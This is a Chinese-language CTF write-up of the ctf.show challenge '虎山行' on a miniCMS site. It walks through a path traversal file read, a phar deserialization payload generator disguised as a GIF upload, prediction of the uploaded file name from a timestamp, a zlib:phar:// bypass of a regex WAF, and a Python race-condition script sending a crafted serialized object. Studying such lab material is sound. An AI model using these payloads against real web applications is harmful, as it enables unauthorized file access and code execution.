虎山行
Last updated
Last updated
给了源码www.rar,是miniCMS,对比源码,找到漏洞点,相当明显。
直接请求flag,发现根目录下没有flag,但是给了提示。
/mc-admin/page-edit.php?file=../../../../../../flag这个是网站目录
<?php
highlight_file(__FILE__);
error_reporting(0);
include('waf.php');
class Ctfshow{
public $ctfer = 'shower';
public function __destruct(){
system('cp /hint* /var/www/html/hint.txt');
}
}
$filename = $_GET['file'];
readgzfile(waf($filename));
?>很明显是要触发__destruct()魔术方法,先尝试一下读取waf.php,发现被WAF了。
/ctfshowsecretfilehh/?file=waf.php那咋办呢,想想上一步也可以读取文件,那就试试吧。
/mc-admin/page-edit.php?file=../../../ctfshowsecretfilehh/waf.php源码
<?php
function waf($file){
if (preg_match("/^phar|smtp|dict|zip|compress|file|etc|root|filter|php|flag|ctf|hint|\.\.\//i",$file)){
die("姿势太简单啦,来一点骚的?!");
}else{
return $file;
}
}phar反序列化
这里的上传点在后台,上传之后再upload目录下。
大概学了一下,phar_gen.php:
<?php
class Ctfshow{
public $ctfer = 'shower';
}
@unlink("exp.char");
$phar = new Phar('exp.phar'); //后缀名必须为phar
$phar->startBuffering(); //开始写入
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$object = new Ctfshow();
$phar->setMetadata($object); //将自定义的meta-data存入manifest
$phar->addFromString('test.txt', 'text'); //添加要压缩的文件
// 签名自动计算
$phar->stopBuffering();
?>生成exp.phar文件。打开长这个样子的:
把文件后缀改为.gif上传。
进了upload目录,发现不给文件名,于是去看一下upload.php
<?php
error_reporting(0);
// 允许上传的图片后缀
$allowedExts = array("gif", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
// echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 2048000) // 小于 2000kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "文件出错: " . $_FILES["file"]["error"] . "<br>";
}
else
{
if (file_exists("upload/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
$md5_unix_random =substr(md5(time()),0,8);
$filename = $md5_unix_random.'.'.$extension;
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
echo "上传成功,文件存在upload/";
}
}
}
else
{
echo "文件类型仅支持jpg、png、gif等图片格式";
}
?>给了文件名具体的生成方式,这就很蛋疼,用burp重新发了一次。
注意到注释其实有给提示?拿到时间。
<?php
$filename=substr(md5(strtotime('Wed, 27 Jan 2021 03:56:43 GMT')),0,8);
echo $filename;传入参数
/ctfshowsecretfilehh/?file=zlib:phar:///var/www/html/upload/d1a86748.gif除了zlib,bzip等等应该也可以。
又是套娃
<?php
show_source(__FILE__);
$unser = $_GET['unser'];
class Unser {
public $username='Firebasky';
public $password;
function __destruct() {
if($this->username=='ctfshow'&&$this->password==(int)md5(time())){
system('cp /ctfshow* /var/www/html/flag.txt');
}
}
}
$ctf=@unserialize($unser);
system('rm -rf /var/www/html/flag.txt');看着像条件竞争,写个脚本
import hashlib
import requests
import time
def md5(t):
string = str(t)
h = hashlib.md5()
h.update(string.encode())
return h.hexdigest()
url = "http://722cd3fb-690b-47c8-93f6-bc36429d2d7c.chall.ctf.show/"
while True:
pwd = md5(int(time.time()))
unser = 'O:5:"Unser":2:{s:8:"username";s:7:"ctfshow";s:8:"password";s:32:"' + pwd + '";}'
params = {'unser': unser}
print(params)
res1 = requests.get(url=url + "ctfshowgetflaghhhh/", params=params)
res2 = requests.get(url=url + "flag.txt")
if res2.text.find("ctfshow") != -1:
print(res2.text)
break
